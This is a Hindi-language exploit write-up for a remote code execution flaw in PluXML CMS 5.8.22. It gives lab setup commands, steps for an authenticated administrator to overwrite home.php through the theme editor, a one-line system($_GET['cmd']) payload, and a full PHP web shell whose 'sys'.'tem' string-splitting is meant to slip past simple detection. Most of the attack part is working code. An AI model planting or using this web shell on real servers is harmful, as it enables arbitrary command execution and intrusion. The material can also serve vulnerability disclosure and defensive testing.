
PluXML CMS संस्करण 5.8.22 में एक महत्वपूर्ण रिमोट कोड निष्पादन (RCE) भेद्यता की पहचान की गई है। यह भेद्यता प्रमाणित व्यवस्थापकों को थीम संपादक कार्यक्षमता के माध्यम से दुर्भावनापूर्ण PHP वेब शेल अपलोड करके वेब सर्वर पर मनमाना PHP कोड निष्पादित करने की अनुमति देती है।
git clone https://github.com/pluxml/PluXml.git
cd PluXml
ddev config --project-type=php --php-version=8.1 --docroot=.
ddev start
चरण-दर-चरण शोषण
प्रमाणीकरण: मान्य प्रशासक क्रेडेंशियल के साथ PluXML प्रशासक पैनल में लॉग इन करें थीम संपादक पर जाएं:
प्रशासन डैशबोर्ड तक पहुंचें
यहां जाएं: Themes → Home.php → Edit

दुर्भावनापूर्ण पेलोड इंजेक्ट करें:
home.php में मौजूदा सामग्री को PHP वेब शेल से बदलें
उदाहरण पेलोड: <?php system($_GET['cmd']); ?>
संशोधित फ़ाइल को सहेजें
निष्पादन ट्रिगर करें:
वेबसाइट के मुख्य होम पेज पर जाएं इंजेक्ट किया गया PHP कोड वेब सर्वर विशेषाधिकारों के साथ निष्पादित होता है
रिवर्स शेल
वेबशेल का पेलोड
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input
type="TEXT"
name="cmd"
autofocus
id="cmd"
size="80"
>
<input
type="SUBMIT"
value="Execute"
>
</form>
<pre>
<?php
if (isset($_GET['cmd'])) {
$func_name = "sys" . "tem";
$func_name($_GET['cmd']);
}
?>
</pre>
</body>
</html>